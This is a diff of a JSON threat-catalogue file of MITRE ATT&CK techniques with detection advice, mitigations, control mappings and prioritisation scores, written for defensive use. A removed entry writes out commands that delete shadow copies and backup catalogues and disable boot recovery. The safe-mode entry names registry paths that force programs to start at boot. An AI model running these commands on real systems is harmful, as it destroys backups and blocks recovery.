-        "detection": "It may be possible to detect domain policy modifications using Windows event logs. Group policy modifications, for example, may be logged under a variety of Windows event IDs for modifying, creating, undeleting, moving, and deleting directory service objects (Event ID 5136, 5137, 5138, 5139, 5141 respectively). Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)\n\nConsider monitoring for commands/cmdlets and command-line arguments that may be leveraged to modify domain policy settings.(Citation: Microsoft - Update or Repair Federated domain) Some domain policy modifications, such as changes to federation settings, are likely to be rare.(Citation: Microsoft 365 Defender Solorigate)",
+        "detection": "Monitor cloud logs for modification or creation of new security groups or firewall rules.",
         "platforms": [
-            "Azure AD",
-            "Windows"
+            "IaaS"
         ],
         "data_sources": [
-            "Active Directory: Active Directory Object Creation",
-            "Active Directory: Active Directory Object Deletion",
-            "Active Directory: Active Directory Object Modification",
-            "Command: Command Execution"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1484.001",
-                "name": "Domain Policy Modification: Group Policy Modification",
-                "url": "https://attack.mitre.org/techniques/T1484/001",
-                "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)",
-                "detection": "It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory service object was modified\n* Event ID 5137 - A directory service object was created\n* Event ID 5138 - A directory service object was undeleted\n* Event ID 5139 - A directory service object was moved\n* Event ID 5141 - A directory service object was deleted\n\n\nGPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).",
-                "mitigations": [
-                    {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
-            },
-            {
-                "tid": "T1484.002",
-                "name": "Domain Policy Modification: Domain Trust Modification",
-                "url": "https://attack.mitre.org/techniques/T1484/002",
-                "description": "Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\n\nManipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate.",
-                "detection": "Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)\n\nMonitor for PowerShell commands such as: Update-MSOLFederatedDomain –DomainName: \"Federated Domain Name\", or Update-MSOLFederatedDomain –DomainName: \"Federated Domain Name\" –supportmultipledomain.(Citation: Microsoft - Update or Repair Federated domain)",
-                "mitigations": [
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            }
+            "Firewall: Firewall Disable",
+            "Firewall: Firewall Rule Modification"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1562",
+        "subtechniques": [],
         "mitigations": [
             {
                 "mid": "M1047",
@@ -10842,12 +33527,6 @@
                 "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
                 "url": "https://attack.mitre.org/mitigations/M1047"
             },
-            {
-                "mid": "M1026",
-                "name": "Privileged Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                "url": "https://attack.mitre.org/mitigations/M1026"
-            },
             {
                 "mid": "M1018",
                 "name": "User Account Management",
@@ -10855,18 +33534,18 @@
                 "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.8071428571428572,
-        "adjusted_score": 0.8071428571428572,
+        "cumulative_score": 0.28095238095238095,
+        "adjusted_score": 0.28095238095238095,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
+        "has_sigma": false,
+        "has_es_siem": false,
         "has_splunk": true,
         "cis_controls": [
+            "3.3",
             "4.1",
             "4.7",
             "5.3",
             "5.4",
-            "5.5",
             "6.1",
             "6.2",
             "6.8",
@@ -10876,194 +33555,148 @@
         "nist_controls": [
             "AC-2",
             "AC-3",
-            "AC-4",
             "AC-5",
             "AC-6",
-            "CA-8",
-            "CM-2",
             "CM-5",
-            "CM-6",
-            "CM-7",
-            "IA-2",
-            "RA-5",
-            "SI-4"
+            "IA-2"
         ],
-        "process_coverage": true,
-        "network_coverage": false,
-        "file_coverage": true,
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.2571428571428571,
-            "mitigation_score": 0.41818181818181815,
-            "detection_score": 0.08
-        },
-        "choke_point_score": 0.55,
-        "prevalence_score": 0
+        "hardware_coverage": false
     },
     {
-        "tid": "T1485",
-        "name": "Data Destruction",
-        "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\n\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).\n\nIn cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)",
-        "url": "https://attack.mitre.org/techniques/T1485",
+        "tid": "T1562.008",
+        "name": "Impair Defenses: Disable Cloud Logs",
+        "description": "An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. \n\nCloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)",
+        "url": "https://attack.mitre.org/techniques/T1562/008",
         "tactics": [
-            "Impact"
+            "Defense Evasion"
         ],
-        "detection": "Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under C:\\Windows\\System32\\.\n\nIn cloud environments, the occurrence of anomalous high-volume deletion events, such as the DeleteDBCluster and DeleteGlobalCluster events in AWS, or a high quantity of data deletion events, such as DeleteBucket, within a short period of time may indicate suspicious activity.",
+        "detection": "Monitor logs for API calls to disable logging. In AWS, monitor for: StopLogging and DeleteTrail.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: google.logging.v2.ConfigServiceV2.UpdateSink.(Citation: Configuring Data Access audit logs)  In Azure, monitor for az monitor diagnostic-settings delete.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.",
         "platforms": [
-            "IaaS",
-            "Linux",
-            "Windows",
-            "macOS"
+            "IaaS"
         ],
         "data_sources": [
-            "Cloud Storage: Cloud Storage Deletion",
-            "Command: Command Execution",
-            "File: File Deletion",
-            "File: File Modification",
-            "Image: Image Deletion",
-            "Instance: Instance Deletion",
-            "Process: Process Creation",
-            "Snapshot: Snapshot Deletion",
-            "Volume: Volume Deletion"
+            "Cloud Service: Cloud Service Disable",
+            "Cloud Service: Cloud Service Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1562",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1053",
-                "name": "Data Backup",
-                "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
-                "url": "https://attack.mitre.org/mitigations/M1053"
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
             }
         ],
-        "cumulative_score": 0.3690899258437931,
-        "adjusted_score": 0.3690899258437931,
+        "cumulative_score": 0.2523809523809524,
+        "adjusted_score": 0.2523809523809524,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "11.1",
-            "11.2",
-            "11.3",
-            "11.4",
-            "11.5"
+            "3.3",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "8.1",
+            "8.2",
+            "8.3"
         ],
         "nist_controls": [
+            "AC-2",
             "AC-3",
+            "AC-5",
             "AC-6",
-            "CM-2",
-            "CP-10",
-            "CP-2",
-            "CP-7",
-            "CP-9",
-            "SI-3",
-            "SI-4",
-            "SI-7"
+            "CM-5",
+            "IA-2"
         ],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": true,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.319047619047619,
-            "mitigation_score": 0.2727272727272727,
-            "detection_score": 0.37
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0.0000423067961740376
+        "hardware_coverage": false
     },
     {
-        "tid": "T1486",
-        "name": "Data Encrypted for Impact",
-        "description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)\n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)\n\nIn cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)",
-        "url": "https://attack.mitre.org/techniques/T1486",
+        "tid": "T1562.009",
+        "name": "Impair Defenses: Safe Mode Boot",
+        "description": "Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)\n\nAdversaries may abuse safe mode to disable endpoint defenses that may not start with a limited boot. Hosts can be forced into safe mode after the next reboot via modifications to Boot Configuration Data (BCD) stores, which are files that manage boot application settings.(Citation: Microsoft bcdedit 2021)\n\nAdversaries may also add their malicious applications to the list of minimal services that start in safe mode by modifying relevant Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)). Malicious [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) objects may also be registered and loaded in safe mode.(Citation: Sophos Snatch Ransomware 2019)(Citation: CyberArk Labs Safe Mode 2016)(Citation: Cybereason Nocturnus MedusaLocker 2020)(Citation: BleepingComputer REvil 2021)",
+        "url": "https://attack.mitre.org/techniques/T1562/009",
         "tactics": [
-            "Impact"
+            "Defense Evasion"
         ],
-        "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.\n\nIn some cases, monitoring for unusual kernel driver installation activity can aid in detection.\n\nIn cloud environments, monitor for events that indicate storage objects have been anomalously replaced by copies.",
+        "detection": "Monitor Registry modification and additions for services that may start on safe mode. For example, a program can be forced to start on safe mode boot by adding a \\* in front of the \"Startup\" value name: HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\[\"\\*Startup\"=\"{Path}\"] or by adding a key to HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal.(Citation: BleepingComputer REvil 2021)(Citation: Sophos Snatch Ransomware 2019)\n\nMonitor execution of processes and commands associated with making configuration changes to boot settings, such as bcdedit.exe and bootcfg.exe.(Citation: Microsoft bcdedit 2021)(Citation: Microsoft Bootcfg)(Citation: Sophos Snatch Ransomware 2019)",
         "platforms": [
-            "IaaS",
-            "Linux",
-            "Windows",
-            "macOS"
+            "Windows"
         ],
         "data_sources": [
-            "Cloud Storage: Cloud Storage Metadata",
-            "Cloud Storage: Cloud Storage Modification",
             "Command: Command Execution",
-            "File: File Creation",
-            "File: File Modification",
-            "Process: Process Creation"
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Creation",
+            "Windows Registry: Windows Registry Key Modification"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1562",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1040",
-                "name": "Behavior Prevention on Endpoint",
-                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
-                "url": "https://attack.mitre.org/mitigations/M1040"
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
             },
             {
-                "mid": "M1053",
-                "name": "Data Backup",
-                "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
-                "url": "https://attack.mitre.org/mitigations/M1053"
+                "mid": "M1054",
+                "name": "Software Configuration",
+                "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.",
+                "url": "https://attack.mitre.org/mitigations/M1054"
             }
         ],
-        "cumulative_score": 0.30178426809523806,
-        "adjusted_score": 0.30178426809523806,
+        "cumulative_score": 0.10476190476190476,
+        "adjusted_score": 0.10476190476190476,
         "has_car": false,
         "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
-        "cis_controls": [
-            "11.1",
-            "11.2",
-            "11.3",
-            "11.4",
-            "11.5"
-        ],
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
         "nist_controls": [
+            "AC-2",
             "AC-3",
+            "AC-5",
             "AC-6",
-            "CM-2",
-            "CP-10",
-            "CP-2",
-            "CP-6",
-            "CP-7",
-            "CP-9",
-            "SI-3",
-            "SI-4",
+            "CM-10",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "IA-9",
+            "SC-23",
+            "SC-8",
             "SI-7"
         ],
         "process_coverage": true,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": true,
-        "cloud_coverage": true,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.23809523809523808,
-            "mitigation_score": 0.2909090909090909,
-            "detection_score": 0.18
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0.01368903
+        "cloud_coverage": false,
+        "hardware_coverage": false
     },
     {
-        "tid": "T1489",
-        "name": "Service Stop",
-        "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)",
-        "url": "https://attack.mitre.org/techniques/T1489",
+        "tid": "T1562.010",
+        "name": "Impair Defenses: Downgrade Attack",
+        "description": "Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) versions 5+ includes Script Block Logging (SBL) which can record executed script content. However, adversaries may attempt to execute a previous version of PowerShell that does not support SBL with the intent to [Impair Defenses](https://attack.mitre.org/techniques/T1562) while running malicious scripts that may have otherwise been detected.(Citation: CrowdStrike BGH Ransomware 2021)(Citation: Mandiant BYOL 2018)\n\nAdversaries may downgrade and use less-secure versions of various features of a system, such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)s or even network protocols that can be abused to enable [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557).(Citation: Praetorian TLS Downgrade Attack 2014)",
+        "url": "https://attack.mitre.org/techniques/T1562/010",
         "tactics": [
-            "Impact"
+            "Defense Evasion"
         ],
-        "detection": "Monitor processes and command-line arguments to see if critical processes are terminated or stop running.\n\nMonitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links.\n\nAlterations to the service binary path or the service startup type changed to disabled may be suspicious.\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)",
+        "detection": "Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: powershell –v 2). Also monitor for other abnormal events, such as execution of and/or processes spawning from a version of a tool that is not expected in the environment.",
         "platforms": [
             "Linux",
             "Windows",
@@ -11071,97 +33704,48 @@
         ],
         "data_sources": [
             "Command: Command Execution",
-            "File: File Modification",
-            "Process: OS API Execution",
             "Process: Process Creation",
-            "Process: Process Termination",
-            "Service: Service Metadata",
-            "Windows Registry: Windows Registry Key Modification"
+            "Process: Process Metadata"
         ],
-        "is_subtechnique": false,
-        "supertechnique": null,
+        "is_subtechnique": true,
+        "supertechnique": "T1562",
         "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1030",
-                "name": "Network Segmentation",
-                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                "url": "https://attack.mitre.org/mitigations/M1030"
-            },
-            {
-                "mid": "M1022",
-                "name": "Restrict File and Directory Permissions",
-                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1022"
-            },
-            {
-                "mid": "M1024",
-                "name": "Restrict Registry Permissions",
-                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
-                "url": "https://attack.mitre.org/mitigations/M1024"
-            },
-            {
-                "mid": "M1018",
-                "name": "User Account Management",
-                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1018"
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
             }
         ],
-        "cumulative_score": 0.5929510276190476,
-        "adjusted_score": 0.5929510276190476,
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
-        "cis_controls": [
-            "3.12",
-            "4.1",
-            "4.7",
-            "5.3",
-            "5.4",
-            "6.1",
-            "6.2",
-            "6.8",
-            "12.2",
-            "12.8"
-        ],
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
         "nist_controls": [
-            "AC-2",
-            "AC-3",
-            "AC-4",
-            "AC-5",
-            "AC-6",
-            "CA-7",
-            "CM-5",
+            "CM-2",
             "CM-6",
-            "CM-7",
-            "IA-2",
-            "SC-46",
-            "SC-7",
+            "RA-5",
             "SI-4"
         ],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.3476190476190476,
-            "mitigation_score": 0.41818181818181815,
-            "detection_score": 0.27
-        },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0.19533198
+        "hardware_coverage": false
     },
     {
-        "tid": "T1490",
-        "name": "Inhibit System Recovery",
-        "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete\n* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet\n* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no",
-        "url": "https://attack.mitre.org/techniques/T1490",
+        "tid": "T1563",
+        "name": "Remote Service Session Hijacking",
+        "description": "Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.\n\nAdversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)",
+        "url": "https://attack.mitre.org/techniques/T1563",
         "tactics": [
-            "Impact"
+            "Lateral Movement"
         ],
-        "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.\n\nMonitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\PreviousVersions\\DisableLocalPage).",
+        "detection": "Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.\n\nMonitor for processes and command-line arguments associated with hijacking service sessions.",
         "platforms": [
             "Linux",
             "Windows",
@@ -11169,198 +33753,332 @@
         ],
         "data_sources": [
             "Command: Command Execution",
-            "File: File Deletion",
-            "Process: Process Creation",
-            "Service: Service Metadata",
-            "Windows Registry: Windows Registry Key Modification"
+            "Logon Session: Logon Session Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow",
+            "Process: Process Creation"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [],
+        "subtechniques": [
+            {
+                "tid": "T1563.001",
+                "name": "Remote Service Session Hijacking: SSH Hijacking",
+                "url": "https://attack.mitre.org/techniques/T1563/001",
+                "description": "Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.\n\nIn order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.(Citation: Slideshare Abusing SSH)(Citation: SSHjack Blackhat)(Citation: Clockwork SSH Agent Hijacking)(Citation: Breach Post-mortem SSH Hijack)\n\n[SSH Hijacking](https://attack.mitre.org/techniques/T1563/001) differs from use of [SSH](https://attack.mitre.org/techniques/T1021/004) because it hijacks an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).",
